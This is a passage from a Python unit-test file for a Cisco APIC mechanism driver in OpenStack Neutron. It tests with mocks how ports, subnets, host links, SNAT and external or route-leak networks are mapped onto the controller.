net = self.create_network(expected_res_status=201)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4)
self._register_agent('h1')
with self.port(subnet=sub) as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
# Bind port to trigger path binding
self._bind_port_to_host(p1['id'], 'h1')
self.driver._add_ip_mapping_details = mock.Mock(
side_effect=Exception)
request = self._request_endpoint_details(p1['id'], 'h1')
self.assertIsNone(request)
def test_snat_port_ip_loss(self):
self._register_agent('h1')
admin_ctx = context.get_admin_context()
self._mock_external_dict([('supported', '192.168.0.2/24')])
self.driver.apic_manager.ext_net_dict[
'supported']['host_pool_cidr'] = '192.168.200.1/24'
# Create external network
net_ext = self.create_network(
is_admin_context=True, tenant_id=mocked.APIC_TENANT,
name='supported',
**{'router:external': 'True'})['network']
self.create_subnet(
is_admin_context=True, tenant_id=mocked.APIC_TENANT,
network_id=net_ext['id'], cidr='8.8.8.0/24',
ip_version=4)
# Create internal network
net = self.create_network(
tenant_id=mocked.APIC_TENANT, expected_res_status=201)['network']
sub = self.create_subnet(
tenant_id=mocked.APIC_TENANT,
network_id=net['id'], cidr='10.0.0.0/24', ip_version=4)['subnet']
# Attach router to them
rtr = self.create_router(
api=self.ext_api, tenant_id=mocked.APIC_TENANT,
external_gateway_info={'network_id': net_ext['id']})['router']
self.l3_plugin.add_router_interface(
context.get_admin_context(), rtr['id'], {'subnet_id': sub['id']})
# Create port on internal subnet
p = self.create_port(
network_id=net['id'], tenant_id=mocked.APIC_TENANT,
device_owner='compute:', device_id='someid',
fixed_ips=[{'subnet_id': sub['id']}])['port']
self._bind_port_to_host(p['id'], 'h1')
# Request gbp details
mapping = self._get_gbp_details(p['id'], 'h1')
self.assertEqual(1, len(mapping['host_snat_ips']))
snat_ports = self.driver.db_plugin.get_ports(
admin_ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'device_id': ['h1']})
# Delete Fixed IPs
self.driver.db_plugin.update_port(
admin_ctx, snat_ports[0]['id'], {'port': {'fixed_ips': []}})
# Re run
mapping = self._get_gbp_details(p['id'], 'h1')
self.assertEqual(1, len(mapping['host_snat_ips']))
snat_ports_2 = self.driver.db_plugin.get_ports(
admin_ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'device_id': ['h1']})
self.assertEqual(1, len(snat_ports))
self.assertEqual(1, len(snat_ports_2))
self.assertNotEqual(snat_ports[0]['id'], snat_ports_2[0]['id'])
class TestCiscoApicML2SubnetScope(ApicML2IntegratedTestCase):
def setUp(self, service_plugins=None):
with tempfile.NamedTemporaryFile(delete=False) as fd:
self.cons_file_name = fd.name
self.override_conf('network_constraints_filename',
self.cons_file_name,
'ml2_cisco_apic')
super(TestCiscoApicML2SubnetScope, self).setUp(service_plugins)
def test_subnet_scope(self):
cons_data = """
[DEFAULT]
subnet_scope = deny
[%s/net1]
public = 10.10.10.1/24,10.10.20.1/24
private = 20.10.10.0/28,20.10.20.0/24
deny = 30.10.10.0/24
default = private
""" % (mocked.APIC_TENANT)
self.driver.net_cons.source.last_refresh_time = 0
with open(self.cons_file_name, 'w') as fd:
fd.write(cons_data)
self.mgr.ensure_subnet_created_on_apic = mock.Mock()
self.driver.name_mapper.aci_mapper.min_suffix = 0
net1 = self.create_network(
name='net1', tenant_id=mocked.APIC_TENANT,
expected_res_status=201)['network']
net2 = self.create_network(
name='net2', tenant_id=mocked.APIC_TENANT,
expected_res_status=201)['network']
for cidr in ['10.10.10.0/28', '20.10.10.0/26', '40.10.10.0/30']:
self.create_subnet(
tenant_id=mocked.APIC_TENANT,
network_id=net1['id'], cidr=cidr, ip_version=4)
exp_calls = [
mock.call(
self._tenant(), self._scoped_name('net1'),
'10.10.10.1/28', scope='public'),
mock.call(
self._tenant(), self._scoped_name('net1'),
'20.10.10.1/26', scope='private'),
mock.call(
self._tenant(), self._scoped_name('net1'),
'40.10.10.1/30', scope='private')]
self._check_call_list(
exp_calls, self.mgr.ensure_subnet_created_on_apic.call_args_list)
res = self.create_subnet(
tenant_id=mocked.APIC_TENANT,
network_id=net1['id'], cidr='30.10.10.0/24', ip_version=4,
expected_res_status=500)
self.assertEqual('HTTPInternalServerError',
res['NeutronError']['type'])
res = self.create_subnet(
tenant_id=mocked.APIC_TENANT,
network_id=net2['id'], cidr='10.10.10.0/24', ip_version=4,
expected_res_status=500)
self.assertEqual('HTTPInternalServerError',
res['NeutronError']['type'])
class MechanismRpcTestCase(ApicML2IntegratedTestBase):
def test_rpc_endpoint_set(self):
self.assertEqual(1, len(self.driver.topology_endpoints))
rpc = self.driver.topology_endpoints[0]
self.assertIsInstance(rpc, mech_rpc.ApicTopologyRpcCallbackMechanism)
def test_peers_loaded(self):
# Verify static configured hosts in rpc peers
self._add_hosts_to_apic(2)
peers = self.rpc._load_peers()
self.assertIn(('h1', 'static'), peers)
self.assertIn(('h2', 'static'), peers)
def test_remove_hostlink(self):
self._register_agent('h1')
self._register_agent('h2')
# Test removal of one link
self._add_hosts_to_apic(3)
self.driver.apic_manager.delete_path = mock.Mock()
net = self.create_network()['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4)
# Create two ports
with self.port(subnet=sub) as p1:
with self.port(subnet=sub) as p2:
self._bind_port_to_host(p1['port']['id'], 'h1')
self._bind_port_to_host(p2['port']['id'], 'h2')
# Remove H1 interface from ACI
self.rpc.update_link(mock.Mock(), 'h1', 'static', None, 0, '1',
'1')
# Assert H1 on net vlan static paths deleted
(self.driver.apic_manager.delete_path.
assert_called_once_with(self._tenant_id, net['id'], '1',
'1', '1'))
self.driver.apic_manager.delete_path.reset_mock()
# Unbound
self.rpc.update_link(mock.Mock(), 'h3', 'static', None, 0, '1',
'3')
self.assertEqual(
0, self.driver.apic_manager.delete_path.call_count)
def test_remove_hostlink_vpc(self):
self._register_agent('h1')
self._add_hosts_to_apic(3, vpc=True)
self.driver.apic_manager.delete_path = mock.Mock()
net = self.create_network()['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4)
# Create two ports
with self.port(subnet=sub) as p1:
self._bind_port_to_host(p1['port']['id'], 'h1')
# Remove H1 interface from ACI
self.rpc.update_link(mock.Mock(), 'h1', 'eth0', None, 0, '1',
'1')
# Another link still exists
self.assertEqual(
0, self.driver.apic_manager.delete_path.call_count)
self.driver.apic_manager.delete_path.reset_mock()
self.rpc.update_link(mock.Mock(), 'h1', 'eth1', None, 0, '2',
'1')
(self.driver.apic_manager.delete_path.
assert_called_once_with(self._tenant_id, net['id'], '2', '1',
'1'))
def test_add_hostlink(self):
self._register_agent('h1')
self._register_agent('h2')
self._register_agent('rhel03')
# Test removal of one link
self._add_hosts_to_apic(2)
net = self.create_network()['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4)
# Create two ports
with self.port(subnet=sub) as p1:
with self.port(subnet=sub) as p2:
with self.port(subnet=sub) as p3:
self._bind_port_to_host(p1['port']['id'], 'h1')
self._bind_port_to_host(p2['port']['id'], 'h2')
self._bind_port_to_host(p3['port']['id'], 'rhel03')
self.driver.apic_manager.ensure_path_created_for_port = (
mock.Mock())
# Add H3 interface from ACI
self.rpc.update_link(
mock.Mock(), 'h3', 'static', None, '3', '1', '3')
# No path created since no port is bound on H3
self.assertEqual(
0,
self.driver.apic_manager.ensure_path_created_for_port.
call_count)
(self.driver.apic_manager.ensure_path_created_for_port.
reset_mock())
# Add H4 interface from ACI
self.rpc.update_link(
mock.Mock(), 'rhel03', 'static', None, '4', '1', '4')
# P3 was bound in H4
net = self.show_network(net['id'],
is_admin_context=True)['network']
(self.driver.apic_manager.ensure_path_created_for_port.
assert_called_once_with(
self._tenant_id, net['id'], 'rhel03',
net['provider:segmentation_id']))
def test_update_hostlink(self):
self._register_agent('h1')
self._add_hosts_to_apic(1)
net1 = self.create_network()['network']
sub1 = self.create_subnet(
network_id=net1['id'], cidr='192.168.0.0/24',
ip_version=4)
net2 = self.create_network()['network']
sub2 = self.create_subnet(
network_id=net2['id'], cidr='192.168.1.0/24',
ip_version=4)
# Create two ports
with self.port(subnet=sub1) as p1:
with self.port(subnet=sub1) as p2:
with self.port(subnet=sub2) as p3:
# Bind all on H1
self._bind_port_to_host(p1['port']['id'], 'h1')
self._bind_port_to_host(p2['port']['id'], 'h1')
self._bind_port_to_host(p3['port']['id'], 'h1')
mgr = self.driver.apic_manager
mgr.delete_path = mock.Mock()
mgr.ensure_path_created_for_port = mock.Mock()
# Change host interface
self.rpc.update_link(
mock.Mock(), 'h1', 'static', None, '1', '1', '24')
# Ports' path have been deleted and reissued two times (one
# for network)
expected_calls_remove = [
mock.call(self._tenant_id, net1['id'], '1', '1', '1'),
mock.call(self._tenant_id, net2['id'], '1', '1', '1')]
# Create path expected calls
net1 = self.show_network(
net1['id'], is_admin_context=True)['network']
net2 = self.show_network(
net2['id'], is_admin_context=True)['network']
expected_calls_add = [
mock.call(self._tenant_id, net1['id'], 'h1',
net1['provider:segmentation_id']),
mock.call(self._tenant_id, net2['id'], 'h1',
net2['provider:segmentation_id'])]
self._check_call_list(
expected_calls_remove,
mgr.delete_path.call_args_list)
self._check_call_list(
expected_calls_add,
mgr.ensure_path_created_for_port.call_args_list)
def test_duplicate_hostlink(self):
self.driver.apic_manager.add_hostlink(
'h1', 'static', None, '1', '1', '1')
# The below doesn't rise
self.rpc.update_link(
mock.Mock(), 'h1', 'static', None, '1', '1', '1')
class TestCiscoApicMechDriver(testlib_api.SqlTestCase,
mocked.ControllerMixin,
mocked.ConfigMixin):
def setUp(self):
super(TestCiscoApicMechDriver, self).setUp()
mocked.ControllerMixin.set_up_mocks(self)
mocked.ConfigMixin.set_up_mocks(self)
self.mock_apic_manager_login_responses()
self.driver = md.APICMechanismDriver()
self.driver.synchronizer = None
self.synchronizer = mock.Mock()
md.APICMechanismDriver.get_base_synchronizer = mock.Mock(
return_value=self.synchronizer)
apic_mapper.ApicName.__eq__ = equal
self.driver.apic_manager = mock.Mock(
name_mapper=mock.Mock(), ext_net_dict=self.external_network_dict)
self.driver.initialize()
self.driver.vif_type = 'test-vif_type'
self.driver.cap_port_filter = 'test-cap_port_filter'
self.driver.name_mapper.aci_mapper.tenant = echo
self.driver.name_mapper.aci_mapper.network = echo
self.driver.name_mapper.aci_mapper.subnet = echo
self.driver.name_mapper.aci_mapper.port = echo
self.driver.name_mapper.aci_mapper.router = echo
self.driver.name_mapper.aci_mapper.pre_existing = echo
self.driver.name_mapper.aci_mapper.echo = echo
self.driver.name_mapper.aci_mapper.app_profile.return_value = (
mocked.APIC_AP)
self.driver.name_mapper.aci_mapper.get_tenant_name.return_value = (
mocked.APIC_TENANT)
self.driver.name_mapper.aci_mapper.update_tenant_name.return_value = (
'new_name')
self.driver.apic_manager.apic.transaction = self.fake_transaction
self.agent = {'configurations': {
'opflex_networks': None,
'bridge_mappings': {'physnet1': 'br-eth1'}}}
mock.patch('neutron.manager.NeutronManager').start()
self.driver._l3_plugin = mock.Mock()
self.driver._allocate_snat_ip = echo
self.driver._create_snat_ip_allocation_subnet = echo
self.driver._delete_snat_ip_allocation_network = echo
def get_resource(context, resource_id):
return {'id': resource_id, 'tenant_id': mocked.APIC_TENANT}
self.driver._l3_plugin.get_router = get_resource
self.driver._l3_plugin.get_routers = mock.Mock(return_value=[
{'id': mocked.APIC_ROUTER, 'tenant_id': mocked.APIC_TENANT}])
self.trimmed_l3out = u'{"l3extOut": {"attributes": {"rn": "Auto-Sub\
"}, "children": [ {"l3extRsNdIfPol": {"tnNdIfPolName": ""}}, \
{"l3extRsDampeningPol": {"tnRtctrlProfileName": ""}}, {"ospfRsIfPol": \
{"tnOspfIfPolName": ""}}, {"l3extRsEngressQosDppPol": {"tnQosDppPolName": ""}}\
, {"bfdRsIfPol": {"tnBfdIfPolName": ""}}, {"bgpRsPeerPfxPol": \
{"tnBgpPeerPfxPolName": ""}}, {"eigrpRsIfPol": {"tnEigrpIfPolName": ""}}, \
{"l3extLNodeP": {"attributes": {"dn": "uni/tn-Sub/out-Auto-Sub/\
lnodep-Leaf3-4_NP"}, "children": [{"l3extLIfP": {"children": [{"\
l3extRsPathL3OutAtt": {"attributes": {"ifInstT": "sub-interface", "encap": \
"vlan-999"}}}]}}]}}, {"l3extRsEctx": {"attributes": {"dn": "uni/tn-Sub\
/out-Auto-Sub/rsectx", "tnFvCtxName": "ctx-Sub"}}}]}}'
self.driver._query_external_EPG = mock.Mock()
self.driver._query_external_EPG.return_value = ['5.5.5.0/24',
'6.6.6.0/24']
def _check_call_list(self, expected, observed):
exp_bkp = expected[:]
obs_bkp = observed[:]
for call in expected:
self.assertTrue(call in observed,
msg='Call not found, expected:\n%s\nobserved:'
'\n%s' % (str(exp_bkp), str(obs_bkp)))
observed.remove(call)
self.assertFalse(
len(observed),
msg='There are more calls than expected: %s' % str(observed))
def test_initialize(self):
mgr = self.driver.apic_manager
self.assertEqual(1, mgr.ensure_infra_created_on_apic.call_count)
self.assertEqual(
1, mgr.ensure_bgp_pod_policy_created_on_apic.call_count)
def test_update_port_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
'vm1', net_ctx, HOST_ID1,
device_owner='any')
mgr = self.driver.apic_manager
self.driver.update_port_postcommit(port_ctx)
mgr.ensure_path_created_for_port.assert_called_once_with(
self._tenant(), mocked.APIC_NETWORK, HOST_ID1,
ENCAP, transaction='transaction', bd_name=None,
app_profile_name=self._app_profile())
def test_update_host(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
'vm1', net_ctx, HOST_ID1,
device_owner='any')
port_ctx.original_host = HOST_ID2
self.driver.update_port_postcommit(port_ctx)
def test_create_port_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1,
seg_type=ofcst.TYPE_OPFLEX)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
'vm1', net_ctx, HOST_ID1,
device_owner='any')
mgr = self.driver.apic_manager
self.assertTrue(self.driver._check_segment_for_agent(
port_ctx._bound_segment, self.agent))
self.driver.create_port_postcommit(port_ctx)
mgr.ensure_path_created_for_port.assert_not_called()
def test_update_port_precommit_empty_tenant_1(self):
self.driver._is_nat_enabled_on_ext_net = mock.Mock()
self.driver._l3_plugin.get_router = mock.Mock(
return_value={'id': mocked.APIC_ROUTER, 'tenant_id': ''})
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1,
seg_type=ofcst.TYPE_OPFLEX,
external=True)
r_cnst = n_constants.DEVICE_OWNER_ROUTER_GW
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
mocked.APIC_ROUTER,
net_ctx, HOST_ID1,
device_owner=r_cnst)
self.assertTrue(self.driver._check_segment_for_agent(
port_ctx._bound_segment, self.agent))
self.driver.update_port_precommit(port_ctx)
self.driver._is_nat_enabled_on_ext_net.assert_not_called()
def test_update_port_precommit_empty_tenant_2(self):
self.driver._is_nat_enabled_on_ext_net = mock.Mock(return_value=False)
self.driver.per_tenant_context = True
self.driver._is_edge_nat = mock.Mock(return_value=False)
self.driver._is_pre_existing = mock.Mock(return_value=False)
self.driver._l3_plugin.get_router = mock.Mock(
return_value={'id': mocked.APIC_ROUTER, 'tenant_id': 'foo'})
self.driver._l3_plugin.get_routers = mock.Mock(
return_value=[{'id': mocked.APIC_ROUTER, 'tenant_id': ''}])
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1,
seg_type=ofcst.TYPE_OPFLEX,
external=True)
r_cnst = n_constants.DEVICE_OWNER_ROUTER_GW
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
mocked.APIC_ROUTER,
net_ctx, HOST_ID1,
device_owner=r_cnst)
self.assertTrue(self.driver._check_segment_for_agent(
port_ctx._bound_segment, self.agent))
self.driver.update_port_precommit(port_ctx)
self.driver._l3_plugin.get_routers.assert_called_once_with(
mock.ANY, filters=mock.ANY)
self.driver._is_pre_existing.assert_called_once_with(mock.ANY)
def test_create_port_postcommit_empty_tenant(self):
self.driver._create_shadow_ext_net_for_nat = mock.Mock()
self.driver._is_nat_enabled_on_ext_net = mock.Mock(return_value=True)
self.driver._l3_plugin.get_router = mock.Mock(
return_value={'id': mocked.APIC_ROUTER, 'tenant_id': ''})
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1,
seg_type=ofcst.TYPE_OPFLEX)
r_cnst = n_constants.DEVICE_OWNER_ROUTER_GW
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
mocked.APIC_ROUTER,
net_ctx, HOST_ID1,
device_owner=r_cnst)
self.assertTrue(self.driver._check_segment_for_agent(
port_ctx._bound_segment, self.agent))
self.driver.create_port_postcommit(port_ctx)
self.driver._create_shadow_ext_net_for_nat.assert_not_called()
def test_create_port_postcommit_opflex(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1, seg_type='opflex')
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
'vm1', net_ctx, HOST_ID1,
device_owner='any')
self.assertTrue(self.driver._check_segment_for_agent(
port_ctx._bound_segment, self.agent))
mgr = self.driver.apic_manager
self.driver.create_port_postcommit(port_ctx)
self.assertFalse(mgr.ensure_path_created_for_port.called)
def test_create_port_cross_tenant(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1)
port_ctx = self._get_port_context('some-admin',
mocked.APIC_NETWORK,
'vm1', net_ctx, HOST_ID1,
device_owner='any')
mgr = self.driver.apic_manager
self.driver.create_port_postcommit(port_ctx)
self.assertEqual(port_ctx.current['tenant_id'], 'some-admin')
# Path creation gets called with the network tenant id
mgr.ensure_path_created_for_port.assert_called_once_with(
self._tenant(), mocked.APIC_NETWORK, HOST_ID1,
ENCAP, transaction='transaction', bd_name=None,
app_profile_name=self._app_profile())
def test_update_port_nobound_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
'vm1', net_ctx, None,
device_owner='any')
self.driver.update_port_postcommit(port_ctx)
mgr = self.driver.apic_manager
self.assertFalse(mgr.ensure_path_created_for_port.called)
def test_create_port_nobound_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
'vm1', net_ctx, None,
device_owner='any')
self.driver.create_port_postcommit(port_ctx)
mgr = self.driver.apic_manager
self.assertFalse(mgr.ensure_path_created_for_port.called)
def _test_update_gw_port_postcommit(self, net_tenant=mocked.APIC_TENANT):
net_ctx = self._get_network_context(net_tenant,
mocked.APIC_NETWORK,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
'vm1', net_ctx, HOST_ID1, gw=True)
mgr = self.driver.apic_manager
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT)
self.driver.update_port_postcommit(port_ctx)
mgr.get_router_contract.assert_called_once_with(
self._scoped_name(port_ctx.current['device_id']),
owner=self._router_tenant())
vrf_pfx = ('%s-' % mocked.APIC_ROUTER
if self.driver.vrf_per_router_tenants else '')
shd_l3out = (self.driver.per_tenant_context and
self._scoped_name(vrf_pfx + mocked.APIC_NETWORK) or
mocked.APIC_NETWORK)
expected_calls = [
mock.call("Shd-%s" % shd_l3out,
owner=self._tenant(ext_nat=True), transaction=mock.ANY,
context=self._routed_network_vrf_name())]
self._check_call_list(
expected_calls,
mgr.ensure_external_routed_network_created.call_args_list)
expected_calls = [
mock.call("Shd-%s" % shd_l3out, subnet='5.5.5.0/24',
external_epg="Shd-%s" % mocked.APIC_EXT_EPG,
owner=self._tenant(ext_nat=True), transaction=mock.ANY),
mock.call("Shd-%s" % shd_l3out, subnet='6.6.6.0/24',
external_epg="Shd-%s" % mocked.APIC_EXT_EPG,
owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
self._check_call_list(
expected_calls, mgr.ensure_external_epg_created.call_args_list)
expected_calls = [
mock.call(
"Shd-%s" % shd_l3out,
mgr.get_router_contract.return_value,
external_epg="Shd-%s" % mocked.APIC_EXT_EPG,
owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.ensure_external_epg_consumed_contract.call_args_list)
expected_calls = [
mock.call(
"Shd-%s" % shd_l3out,
mgr.get_router_contract.return_value,
external_epg="Shd-%s" % mocked.APIC_EXT_EPG,
owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.ensure_external_epg_provided_contract.call_args_list)
def test_update_gw_port_postcommit(self):
self._test_update_gw_port_postcommit()
def test_update_cross_tenant_gw_port_postcommit(self):
self._test_update_gw_port_postcommit('admin_tenant')
def _test_update_edge_nat_gw_port_postcommit(
self, net_tenant=mocked.APIC_TENANT):
net_ctx = self._get_network_context(net_tenant,
mocked.APIC_NETWORK_EDGE_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_EDGE_NAT,
'vm1', net_ctx, HOST_ID1, gw=True)
mgr = self.driver.apic_manager
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT)
self.driver.l3out_vlan_alloc.reserve_vlan = mock.Mock()
manager.NeutronManager = mock.MagicMock()
manager.NeutronManager.get_plugin().get_networks.return_value = [
{'tenant_id': mocked.APIC_TENANT,
'name': mocked.APIC_NETWORK,
'id': u'net_id'}]
self.driver.update_port_postcommit(port_ctx)
mgr.get_router_contract.assert_called_once_with(
self._scoped_name(port_ctx.current['device_id']),
owner=self._router_tenant())
vrf_pfx = ('%s-' % mocked.APIC_ROUTER
if self.driver.vrf_per_router_tenants else '')
l3out_name = (self.driver.per_tenant_context and
self._scoped_name(vrf_pfx + mocked.APIC_NETWORK_EDGE_NAT)
or mocked.APIC_NETWORK_EDGE_NAT)
l3out_name = "Auto-%s" % l3out_name
expected_calls = [
mock.call(l3out_name,
owner=self._tenant(ext_nat=True), transaction=mock.ANY,
context=self._routed_network_vrf_name())]
self._check_call_list(
expected_calls,
mgr.ensure_external_routed_network_created.call_args_list)
expected_calls = [
mock.call(l3out_name, subnet='5.5.5.0/24',
external_epg="Auto-%s" % mocked.APIC_EXT_EPG,
owner=self._tenant(ext_nat=True), transaction=mock.ANY),
mock.call(l3out_name, subnet='6.6.6.0/24',
external_epg="Auto-%s" % mocked.APIC_EXT_EPG,
owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
self._check_call_list(
expected_calls, mgr.ensure_external_epg_created.call_args_list)
self.driver.l3out_vlan_alloc.reserve_vlan.assert_called_once_with(
mocked.APIC_NETWORK_EDGE_NAT + '-name',
self._routed_network_vrf_name(),
self._tenant(ext_nat=True))
self.assertTrue(mgr.set_domain_for_external_routed_network.called)
self.assertTrue(mgr.ensure_logical_node_profile_created.called)
self.assertTrue(mgr.ensure_static_route_created.called)
bd_name = self._scoped_name('net_id')
mgr.set_l3out_for_bd.assert_called_once_with(
self._tenant(), bd_name, l3out_name, transaction=mock.ANY)
expected_calls = [
mock.call(
l3out_name,
mgr.get_router_contract.return_value,
external_epg="Auto-%s" % mocked.APIC_EXT_EPG,
owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.ensure_external_epg_consumed_contract.call_args_list)
expected_calls = [
mock.call(
l3out_name,
mgr.get_router_contract.return_value,
external_epg="Auto-%s" % mocked.APIC_EXT_EPG,
owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.ensure_external_epg_provided_contract.call_args_list)
def test_update_edge_nat_gw_port_postcommit(self):
self._test_update_edge_nat_gw_port_postcommit()
def test_update_cross_tenant_edge_nat_gw_port_postcommit(self):
self._test_update_edge_nat_gw_port_postcommit('admin_tenant')
def _test_update_interface_port_postcommit(self, no_nat=False, pre=False,
net_tenant=None,
route_leak=False):
net_tenant = net_tenant or mocked.APIC_TENANT
if self.driver.vrf_per_router_tenants:
self.driver.vrf_per_router_tenants.append(net_tenant)
if no_nat:
ext_net = mocked.APIC_NETWORK_NO_NAT
if pre:
self.external_network_dict[ext_net + '-name'][
'preexisting'] = 'True'
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': self._tenant(),
'vrf_name': self._network_vrf_name(),
'vrf_tenant': self._tenant(vrf=True)}
else:
ext_net = mocked.APIC_NETWORK_EDGE_NAT
net_ctx = self._get_network_context(net_tenant,
'net_id',
TEST_SEGMENT1,
route_leak=route_leak)
net_ctx1 = self._get_network_context(net_tenant,
'net_id1',
TEST_SEGMENT1,
route_leak=route_leak)
port_ctx = self._get_port_context(net_tenant,
'net_id',
'vm1', net_ctx, HOST_ID1,
interface=True)
if route_leak:
self.driver._l3_plugin.get_router = mock.Mock(
return_value={'id': 'some_id',
'name': mocked.APIC_ROUTER + '-name',
'tenant_id': net_tenant,
'apic:use_routing_context': mocked.APIC_ROUTER,
'external_gateway_info':
{'network_id': ext_net,
'external_fixed_ips': []}})
else:
self.driver._l3_plugin.get_router = mock.Mock(
return_value={'id': mocked.APIC_ROUTER,
'name': mocked.APIC_ROUTER + '-name',
'tenant_id': net_tenant,
'external_gateway_info':
{'network_id': ext_net,
'external_fixed_ips': []}})
port_ctx._plugin.get_network = mock.Mock(
return_value={'name': ext_net + '-name',
'tenant_id': mocked.APIC_TENANT,
'router:external': True})
self.driver._get_route_leak_networks = mock.Mock(
return_value=([net_ctx.current, net_ctx1.current]))
port_ctx._plugin.get_subnets = mock.Mock(
return_value=[{'tenant_id': mocked.APIC_TENANT,
'id': 'some_id',
'cidr': '5.5.5.0/24'}])
if route_leak:
self.driver._get_subnet_info = mock.Mock(
return_value=(mocked.APIC_TENANT, ext_net + '-name',
'3.3.3.1/24'))
port_ctx._plugin.get_subnets = mock.Mock(
return_value=[{'tenant_id': mocked.APIC_TENANT,
'id': 'some_id',
'cidr': '5.5.5.0/24'},
{'tenant_id': mocked.APIC_TENANT,
'id': 'some_id1',
'cidr': '6.6.6.0/24'}])
self.driver.update_port_postcommit(port_ctx)
prefix = ('%s-' % mocked.APIC_ROUTER
if self.driver.vrf_per_router_tenants and not no_nat else '')
l3out_name = (self.driver.per_tenant_context and
self._scoped_name(prefix + ext_net) or ext_net)
if not no_nat:
l3out_name = "Auto-%s" % l3out_name
elif pre:
l3out_name = self._scoped_name(ext_net + '-name', preexisting=True)
bd_tenant = self._tenant(neutron_tenant=net_tenant)
bd_name = self._scoped_name('net_id', tenant=net_tenant)
mgr = self.driver.apic_manager
if self.driver.vrf_per_router_tenants:
leak_l3out = 'Leak-%s' % net_ctx.current['name']
leak_l3out1 = 'Leak-%s' % net_ctx1.current['name']
leak_ext_epg = 'Leak-%s-%s' % (mocked.APIC_ROUTER + '-name',
mocked.APIC_EXT_EPG)
if route_leak:
leak_bd_name = 'Leak-%s-%s' % (mocked.APIC_ROUTER, bd_name)
mgr.ensure_bd_created_on_apic.assert_called_once_with(
bd_tenant, leak_bd_name, ctx_owner=bd_tenant,
ctx_name=self._routed_network_vrf_name(tenant=net_tenant),
transaction=mock.ANY)
leak_epg_name = 'Leak-%s-%s' % (mocked.APIC_ROUTER, 'net_id')
mgr.ensure_epg_created.assert_called_once_with(
bd_tenant, leak_epg_name, bd_name=leak_bd_name,
app_profile_name=self._app_profile(),
transaction=mock.ANY)
mgr.ensure_subnet_created_on_apic.assert_called_once_with(
bd_tenant, leak_bd_name, '3.3.3.1/24',
scope=None, transaction=mock.ANY)
contract_name = 'contract-%s' % mocked.APIC_ROUTER
expected_calls = [
mock.call(
bd_tenant, leak_epg_name, contract_name,
app_profile_name=self._app_profile(),
transaction=mock.ANY),
mock.call(
bd_tenant, leak_epg_name, contract_name,
app_profile_name=self._app_profile(), provider=True,
transaction=mock.ANY)]
self._check_call_list(
expected_calls, mgr.set_contract_for_epg.call_args_list)
expected_calls = [
mock.call(leak_l3out, subnet='5.5.5.0/24',
external_epg=leak_ext_epg,
owner=bd_tenant, transaction=mock.ANY),
mock.call(leak_l3out, subnet='6.6.6.0/24',
external_epg=leak_ext_epg,
owner=bd_tenant, transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.ensure_external_epg_created.call_args_list)
(mgr.ensure_external_epg_consumed_contract.
assert_called_once_with(
leak_l3out, contract_name,
external_epg=leak_ext_epg,
owner=bd_tenant, transaction=mock.ANY))
(mgr.ensure_external_epg_provided_contract.
assert_called_once_with(
leak_l3out, contract_name,
external_epg=leak_ext_epg,
owner=bd_tenant, transaction=mock.ANY))
mgr.associate_external_epg_to_nat_epg.assert_called_once_with(
bd_tenant, leak_l3out, leak_ext_epg,
leak_epg_name, target_owner=bd_tenant,
app_profile_name=self._app_profile(),
transaction=mock.ANY)
else:
mgr.set_context_for_bd.assert_called_once_with(
bd_tenant, bd_name,
self._routed_network_vrf_name(tenant=net_tenant),
transaction=mock.ANY)
